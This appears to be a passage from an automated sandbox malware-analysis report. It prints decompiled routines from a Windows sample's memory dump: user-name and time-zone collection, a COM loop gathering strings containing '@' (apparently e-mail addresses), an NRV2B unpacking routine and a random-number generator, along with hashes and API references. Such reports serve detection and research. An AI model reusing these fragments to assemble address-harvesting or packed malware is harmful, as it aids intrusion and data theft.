    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Version$InfoNativeSystem
    • String ID:
    • API String ID: 2518960133-0
    • Opcode ID: f5ad80b17dd0358bfdef3a09cde0315c682f7347bc322d753d5a595c3ef14ec3
    • Instruction ID: 8a81b1511fa57e1e60e569e877bf74d9cb5d6e193c674df31d3aab02e37b4a5e
    • Opcode Fuzzy Hash: f5ad80b17dd0358bfdef3a09cde0315c682f7347bc322d753d5a595c3ef14ec3
    • Instruction Fuzzy Hash: 210162349002498ADB31DBA6C901BEDB7F4AF08704F0488BAD558F36D1E778DA84DB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004164AA() {
    				struct _FILETIME _v12;
    				struct _SYSTEMTIME _v28;
    
    				GetSystemTime( &_v28);
    				SystemTimeToFileTime( &_v28,  &_v12);
    				return E00416508( &_v12);
    			}

    APIs
    • GetSystemTime.KERNEL32(?,?,?,00404F5A), ref: 004164B4
    • SystemTimeToFileTime.KERNEL32(?,?,?,?,00404F5A), ref: 004164C2
      • Part of subcall function 00416508: __aulldiv.LIBCMT ref: 00416521
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Time$System$File__aulldiv
    • String ID:
    • API String ID: 1459046340-0
    • Opcode ID: 79ced9a304a9af190eca9eb9d40e32a8b959a0ae06c7582295d629f1b2a79997
    • Instruction ID: dace9a1fb8ff21888bbbf00d3cdf3f47af4135df61ce7d57ed4e77e2204f6748
    • Opcode Fuzzy Hash: 79ced9a304a9af190eca9eb9d40e32a8b959a0ae06c7582295d629f1b2a79997
    • Instruction Fuzzy Hash: F3D09E7580010EABCF04EFE4D94ACDE7BBCAA08309F400461A201E2051EA34E2468BD4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0040A86D() {
    				signed int _v5;
    				void* _v12;
    				signed short* _v16;
    				char _v20;
    				void* _v24;
    				void* _v28;
    				void* _v32;
    				char _v36;
    				char _v40;
    				char _v56;
    				void* _v260;
    				char _v356;
    				char _v460;
    				void* __edi;
    				void* __esi;
    				char* _t52;
    				void* _t53;
    				void* _t55;
    				void* _t65;
    				intOrPtr* _t67;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				intOrPtr* _t73;
    				intOrPtr* _t75;
    				intOrPtr* _t77;
    				intOrPtr* _t79;
    				intOrPtr* _t84;
    				intOrPtr* _t86;
    				void* _t87;
    				signed short* _t88;
    				intOrPtr _t96;
    				signed int _t113;
    				intOrPtr* _t117;
    				char* _t119;
    				char* _t121;
    
    				_t52 =  &_v32;
    				_v32 = 0;
    				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t52);
    				if(_t52 != 0) {
    					L3:
    					_v16 = 0;
    					_t117 = 0;
    					L4:
    					if(_t117 == 0) {
    						return _t52;
    					}
    					_t53 = 0x39;
    					E0040FA33(_t53,  &_v56);
    					_t121 =  &_v40;
    					_t55 = 0x3a;
    					E0040FA33(_t55, _t121);
    					_push(_t121);
    					_push( &_v56);
    					_push(_t117);
    					_v20 = 0;
    					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
    						L31:
    						 *((intOrPtr*)( *_t117 + 8))(_t117);
    						_push(0xcc);
    						return E004099E1(_t114, _v20, 0x38);
    					}
    					_push( &_v12);
    					_push(_t117);
    					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
    						goto L31;
    					}
    					_t65 = 0x3b;
    					E0040FA33(_t65,  &_v356);
    					_t67 = _v12;
    					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
    					_t69 = _v12;
    					_push(_t69);
    					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
    						L30:
    						_t71 = _v12;
    						 *((intOrPtr*)( *_t71 + 8))(_t71);
    						goto L31;
    					}
    					_t96 = 0x64;
    					do {
    						_t73 = _v12;
    						_t114 =  &_v28;
    						_push( &_v28);
    						_push(_t73);
    						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
    							goto L28;
    						}
    						_t77 = _v28;
    						_t114 =  &_v24;
    						_push( &_v24);
    						_push(0x4015d0);
    						_push(_t77);
    						if( *((intOrPtr*)( *_t77))() != 0) {
    							L27:
    							_t79 = _v28;
    							 *((intOrPtr*)( *_t79 + 8))(_t79);
    							goto L28;
    						}
    						_v5 = 1;
    						while(1) {
    							_push(_v5 & 0x000000ff);
    							_push( &_v356);
    							_t114 = 0x34;
    							_t119 =  &_v460;
    							if(E0041709B( &_v356, _t114, _t119) <= 0) {
    								break;
    							}
    							_t86 = _v24;
    							_t114 = _t119;
    							_v36 = _t96;
    							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
    							if(_t87 != 0) {
    								if(_t87 == 0x7a || _t87 == 1) {
    									L25:
    									_v5 = _v5 + 1;
    									if(_v5 <= _t96) {
    										continue;
    									}
    								}
    								break;
    							}
    							_t88 =  &_v260;
    							if(_v260 == 0) {
    								L18:
    								if( *_t88 != 0x40) {
    									_t88 = 0;
    								}
    								L20:
    								if(_t88 != 0 && E0041679C( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
    									E0041679C(1,  &_v20, 0x40323c);
    								}
    								goto L25;
    							}
    							_t113 = _v260 & 0x0000ffff;
    							while(_t113 != 0x40) {
    								_t88 =  &(_t88[1]);
    								_t113 =  *_t88 & 0x0000ffff;
    								if(_t113 != 0) {
    									continue;
    								}
    								goto L18;
    							}
    							goto L20;
    						}
    						_t84 = _v24;
    						 *((intOrPtr*)( *_t84 + 8))(_t84);
    						goto L27;
    						L28:
    						_t75 = _v12;
    						_push(_t75);
    					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
    					_t117 = _v16;
    					goto L30;
    				}
    				_t117 = _v32;
    				if(_t117 == 0) {
    					goto L3;
    				} else {
    					_v16 = _t117;
    					goto L4;
    				}
    			}

    APIs
    • CoCreateInstance.OLE32(004015E0,00000000,00004401,004015C0,?), ref: 0040A892
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: fd6d80ddc1a88f460db875b9c6e04280f16d348fa4b0f49693f4bce4ee3000a7
    • Instruction ID: e5f870759dab17c5d03ae21c1e850a2771498fc7beee0647b5f106428c32a445
    • Opcode Fuzzy Hash: fd6d80ddc1a88f460db875b9c6e04280f16d348fa4b0f49693f4bce4ee3000a7
    • Instruction Fuzzy Hash: CA515D71A00309ABDB10DBA1C884AEFB778EF88714F1444AAE505FB2C1E779ED42CB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0041D595(signed short* __eax, void* __ecx) {
    				signed int _v8;
    				void* __esi;
    				signed int* _t7;
    				void* _t8;
    				signed short* _t9;
    				signed int _t10;
    				signed int _t13;
    				signed short _t14;
    				void* _t15;
    
    				_t16 = __eax;
    				_t7 =  &_v8;
    				_v8 = 0x104;
    				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
    				if(_t7 == 0) {
    					L8:
    					_t8 = 6;
    					_t9 = E0040FA33(_t8, _t16);
    				} else {
    					_t10 = _v8;
    					if(_t10 == 0) {
    						goto L8;
    					} else {
    						 *((short*)(__eax + _t10 * 2)) = 0;
    						_t9 = __eax;
    						if( *((intOrPtr*)(__eax)) != 0) {
    							do {
    								_t13 =  *_t9 & 0x0000ffff;
    								if(_t13 == 0x2f || _t13 == 0x5c) {
    									_t14 = 0x7c;
    									 *_t9 = _t14;
    								}
    								_t9 =  &(_t9[1]);
    							} while ( *_t9 != 0);
    						}
    					}
    				}
    				return _t9;
    			}

    APIs
    • GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D6EC,?,?,00000000), ref: 0041D5AA
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: NameUser
    • String ID:
    • API String ID: 2645101109-0
    • Opcode ID: 16b9c979eba87bd0766cd185d71447ef519bffe0d1067e8b5d33f47e65585074
    • Instruction ID: 9c09c427fb3b4b6d23918dac1030fa52aab09456243a78482960d22f1a9e8b23
    • Opcode Fuzzy Hash: 16b9c979eba87bd0766cd185d71447ef519bffe0d1067e8b5d33f47e65585074
    • Instruction Fuzzy Hash: 6DF0F0B1B04200BADB346B14D802AEBB3BADF05758F10045BF002DB2D0E6B88EC0C368
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004164D2() {
    				long _t7;
    				signed int _t8;
    				intOrPtr _t9;
    				void* _t11;
    				void* _t13;
    
    				_t11 = _t13 - 0x78;
    				_t7 = GetTimeZoneInformation(_t11 - 0x34);
    				if(_t7 != 1) {
    					if(_t7 != 2) {
    						_t8 = 0;
    					} else {
    						_t9 =  *((intOrPtr*)(_t11 + 0x74));
    						goto L4;
    					}
    				} else {
    					_t9 =  *((intOrPtr*)(_t11 + 0x20));
    					L4:
    					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
    				}
    				return _t8;
    			}

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 004164E1
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: fb1614529a2ca94a20516896b80b13449183988355c13b843054bef5f99da4ae
    • Instruction ID: 68433d06efe2d18851ceb11f122dd1e131cd8b78d7dfadfef2c0dac4487c590a
    • Opcode Fuzzy Hash: fb1614529a2ca94a20516896b80b13449183988355c13b843054bef5f99da4ae
    • Instruction Fuzzy Hash: 44E0CD3154410CDBDF20DFA8EE459DD77F9A711304F310826F501F7140D22CE985864B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00401A63(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
    				intOrPtr* _t95;
    				void* _t96;
    				void* _t98;
    				intOrPtr* _t100;
    				void* _t102;
    				intOrPtr* _t104;
    				signed char _t111;
    				signed char _t112;
    				signed char _t113;
    				signed char _t114;
    				signed char _t127;
    				signed char _t128;
    				signed char _t132;
    				signed char _t133;
    				void* _t165;
    				void* _t168;
    				intOrPtr* _t169;
    				void* _t170;
    				void* _t171;
    				intOrPtr* _t172;
    				intOrPtr* _t187;
    				intOrPtr* _t188;
    				void* _t189;
    				intOrPtr* _t191;
    				signed char _t195;
    				intOrPtr* _t205;
    				signed char _t213;
    				signed char _t217;
    				intOrPtr* _t224;
    				intOrPtr* _t225;
    				void* _t226;
    				intOrPtr* _t229;
    				void* _t230;
    				intOrPtr* _t232;
    				intOrPtr* _t233;
    				void* _t236;
    				intOrPtr* _t237;
    				void* _t239;
    				void* _t241;
    				void* _t242;
    				void* _t243;
    				void* _t245;
    				void* _t246;
    				void* _t249;
    				void* _t251;
    				void* _t252;
    				void* _t253;
    				void* _t254;
    
    				_t232 = __esi;
    				_t168 = __ebx;
    				_t205 = __edx + __ecx;
    				 *__eax =  *__eax + __ebx;
    				_t253 = _t252 + __ecx;
    				 *_t205 =  *_t205 + __ebx;
    				 *__esi =  *__esi + __ecx;
    				_t95 = __eax + _t205;
    				 *_t95 =  *_t95 + _t205;
    				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
    				asm("rol byte [ecx], cl");
    				_t224 = __edi + __ecx + 1;
    				_t242 = _t241 + _t205;
    				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
    				_pop(_t96);
    				_t187 = __ecx + _t205 + __ebx;
    				_t5 = __esi + 1;
    				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
    				asm("fild dword [ecx]");
    				if( *_t5 >= 0) {
    					asm("fiadd word [ecx]");
    				}
    				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
    				asm("loopne 0x3");
    				_push(_t242);
    				_t169 = _t168 + _t253;
    				 *_t169 =  *_t169 + _t96;
    				_t243 = _t242 + _t253;
    				 *_t205 =  *_t205 + _t224;
    				_t233 = _t232 + _t253;
    				 *_t224 =  *_t224 + _t96;
    				 *0x1901ea01 =  *0x1901ea01 + _t187;
    				_t254 = _t253 + _t243;
    				 *_t169 =  *_t169 + _t169;
    				_t225 = _t224 + _t243;
    				 *_t225 =  *_t225 + _t187;
    				_t98 = _t96 + _t243 + _t233;
    				 *_t187 =  *_t187 + _t205;
    				_t188 = _t187 + _t233;
    				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
    				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
    				asm("cmc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
    				asm("clc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
    				asm("stc");
    				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
    				asm("sti");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
    				 *_t188 =  *_t188 + 1;
    				asm("arpl [ecx], ax");
    				 *_t188 =  *_t188 + 1;
    				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
    				_t170 = _t169 +  *_t233;
    				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
    				asm("daa");
    				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
    				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
    				_t189 = _t188 +  *_t100;
    				_t102 = _t100 +  *_t100 + _t170;
    				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
    				asm("insb");
    				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
    				_t236 = _t233 + _t100 + _t171 + _t254;
    				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
    				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
    				_t104 = _t102 +  *_t191 + _t225;
    				_t237 = _t236 + _t225;
    				 *0xa3013803 = _t104;
    				asm("movsd");
    				_t246 = _t245 +  *_t104;
    				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
    				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
    				_push(_t225);
    				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
    				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
    				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
    				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
    				asm("rol byte [ebx], cl");
    				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
    				_push(0x6a03de01);
    				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
    				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
    				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
    				_t230 = _t229 + _t249;
    				asm("repne add ecx, [ebp+0x1]");
    				asm("repe add esi, [edi]");
    				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
    				asm("std");
    				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
    				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
    				_t111 = 0x3e +  *_t195 * 0x7e;
    				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
    				_t112 = _t111 + 0xc;
    				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
    				_t113 = _t112 + 1;
    				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
    				_t114 = _t113 + 0xf2;
    				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
    				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
    				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
    				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
    				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
    				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
    				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
    				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
    				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
    				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
    				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
    				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
    				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
    				_t127 = _t114 + 0x99a;
    				_t128 = _t127 + 0xc1;
    				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
    				_t133 = _t132 + 0xca;
    				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
    				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
    				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
    				asm("sbb eax, [esi]");
    				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
    • Instruction ID: 55d3e9609bf348a9fb4723383907df3ddc6c7a765dd6061a9ac0a72b1461db3b
    • Instruction Fuzzy Hash: 7581B5319893918BCB95DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51
    Uniqueness
    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			/* Editor's annotation (not emitted by the decompiler): this routine matches the UCL NRV2B
    			   decoder with a 32-bit bit buffer (nrv2b_d32). Tag bits come from 32-bit words, bit 31 first;
    			   a set bit copies one literal byte, a clear bit reads a gamma-coded offset (2 = reuse the
    			   previous offset, 0xffffffff = end of stream) and a gamma-coded length, adding one to the
    			   length when the offset exceeds 0xd00. _a4 = source, _a8 = source length, _a12 = destination,
    			   _a16 = out pointer for the decompressed length; the return value is whether the whole
    			   input was consumed. */
    			E004190FB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				unsigned int _t67;
    				signed int _t68;
    				intOrPtr _t71;
    				void* _t79;
    				signed int _t81;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				signed int _t98;
    				signed int _t99;
    				signed int _t100;
    				signed int _t101;
    				signed int _t102;
    				unsigned int _t103;
    				signed int _t104;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t115;
    				signed int _t116;
    				intOrPtr* _t119;
    				unsigned int _t125;
    				signed int _t126;
    				signed int _t128;
    
    				_t71 = _a4;
    				_t98 = 0;
    				_t99 = 0;
    				_v16 = 0;
    				_v20 = 1;
    				L1:
    				while(1) {
    					if(_t99 == 0) {
    						_t103 =  *(_t98 + _t71);
    						_t98 = _t98 + 4;
    						_t99 = 0x1f;
    						_t104 = _t103 >> 0x1f;
    					} else {
    						_t99 = _t99 - 1;
    						_t104 = _t67 >> _t99 & 0x00000001;
    					}
    					if(_t104 != 0) {
    						_v16 = _v16 + 1;
    						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
    						_t98 = _t98 + 1;
    						L6:
    						_t71 = _a4;
    						continue;
    					}
    					_v12 = 1;
    					do {
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t100 = 0x1f;
    							_t106 = _t67 >> 0x1f;
    						} else {
    							_t100 = _t99 - 1;
    							_t106 = _t67 >> _t100 & 0x00000001;
    						}
    						_v12 = _t106 + _v12 * 2;
    						if(_t100 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t108 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t100 - 1;
    							_t108 = _t67 >> _t99 & 0x00000001;
    						}
    					} while (_t108 == 0);
    					_t111 = _v12;
    					if(_t111 == 2) {
    						_t81 = _v20;
    						L19:
    						_v12 = _t81;
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t101 = 0x1f;
    							_v8 = _t67 >> 0x1f;
    						} else {
    							_t101 = _t99 - 1;
    							_v8 = _t67 >> _t101 & 0x00000001;
    						}
    						if(_t101 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t115 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t101 - 1;
    							_t115 = _t67 >> _t99 & 0x00000001;
    						}
    						_t116 = _t115 + _v8 * 2;
    						_v8 = _t116;
    						if(_t116 == 0) {
    							_v8 = 1;
    							do {
    								if(_t99 == 0) {
    									_t125 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t102 = 0x1f;
    									_t126 = _t125 >> 0x1f;
    								} else {
    									_t102 = _t99 - 1;
    									_t126 = _t67 >> _t102 & 0x00000001;
    								}
    								_v8 = _t126 + _v8 * 2;
    								if(_t102 == 0) {
    									_t67 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t99 = 0x1f;
    									_t128 = _t67 >> 0x1f;
    								} else {
    									_t99 = _t102 - 1;
    									_t128 = _t67 >> _t99 & 0x00000001;
    								}
    							} while (_t128 == 0);
    							_v8 = _v8 + 2;
    						}
    						asm("sbb ecx, ecx");
    						_v8 = _v8 +  ~0xd00;
    						_t87 = _v16;
    						_t119 = _t87 - _v12 + _a12;
    						_v16 = _t119;
    						 *((char*)(_t87 + _a12)) =  *_t119;
    						_t88 = _t87 + 1;
    						_v16 = _v16 + 1;
    						do {
    							 *((char*)(_t88 + _a12)) =  *_v16;
    							_t88 = _t88 + 1;
    							_v16 = _v16 + 1;
    							_t57 =  &_v8;
    							 *_t57 = _v8 - 1;
    						} while ( *_t57 != 0);
    						_v16 = _t88;
    						goto L6;
    					}
    					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
    					_t98 = _t98 + 1;
    					if(_t79 != 0xffffffff) {
    						_t81 = _t79 + 1;
    						_v20 = _t81;
    						goto L19;
    					}
    					_t68 = _a16;
    					 *_t68 = _v16;
    					return _t68 & 0xffffff00 | _t98 == _a8;
    				}
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
    • Instruction ID: a489a378778222c108fe8a20f86dfbba30c169a164a547a7ba1a429a0153e299
    • Instruction Fuzzy Hash: F951E632E04926ABDB14CE58C4602EDF7B1EF85324F1A42AACD06BF385C674ADC1D784
    Uniqueness
    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			/* Editor's annotation (not emitted by the decompiler): a Mersenne Twister (MT19937) step.
    			   The 0x270 (624)-word state lives at 0x423648 and is regenerated when the index at 0x424018
    			   reaches 624, using the standard 227/397 split (state[i+397] is at 0x423c7c + i*4, the
    			   wrap-around term is *(_t63 - 0x38c) = state[i-227]) and the two-entry xor table at
    			   0x4223a0. The return value applies the MT tempering shifts 11, 7, 15 and 18; the masks as
    			   decompiled (0xff3a58ad, 0xffffdf8c) differ from the reference 0x9d2c5680 / 0xefc60000. */
    			E00417559() {
    				signed int _t23;
    				signed int _t59;
    				signed int* _t63;
    				signed int _t64;
    
    				_t23 =  *0x424018;
    				if(_t23 >= 0x270) {
    					_t64 = 0;
    					do {
    						_t59 = _t64;
    						_t64 = _t64 + 1;
    						0x423648[_t59] = (( *(0x42364c + _t59 * 4) ^ 0x423648[_t59]) & 0x7fffffff ^ 0x423648[_t59]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x42364c + _t59 * 4) ^ 0x423648[_t59]) & 0x7fffffff ^ 0x423648[_t59]) & 0x00000001) * 4) ^  *(0x423c7c + _t59 * 4);
    					} while (_t64 < 0xe3);
    					if(_t64 < 0x26f) {
    						_t63 =  &(0x423648[_t64]);
    						do {
    							 *_t63 =  *(0x4223a0 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
    							_t63 =  &(_t63[1]);
    						} while (_t63 < 0x424004);
    					}
    					 *0x424004 = (( *0x423648 ^  *0x424004) & 0x7fffffff ^  *0x424004) >> 0x00000001 ^  *(0x4223a0 + ((( *0x423648 ^  *0x424004) & 0x7fffffff ^  *0x424004) & 0x00000001) * 4) ^  *0x423c78;
    					_t23 = 0;
    				}
    				 *0x424018 = _t23 + 1;
    				return (0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b ^ ((0x423648[_t23] ^ 0x423648[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • Opcode ID: 19a0806b874a270439345c9ed2c6980d9dac03ec74414907bfa786a47eb1a62f
    • Instruction ID: b4d4bd1b5ba987959425564b8a172c545b52f2395b3a9ab3e94b0888c2bd3430
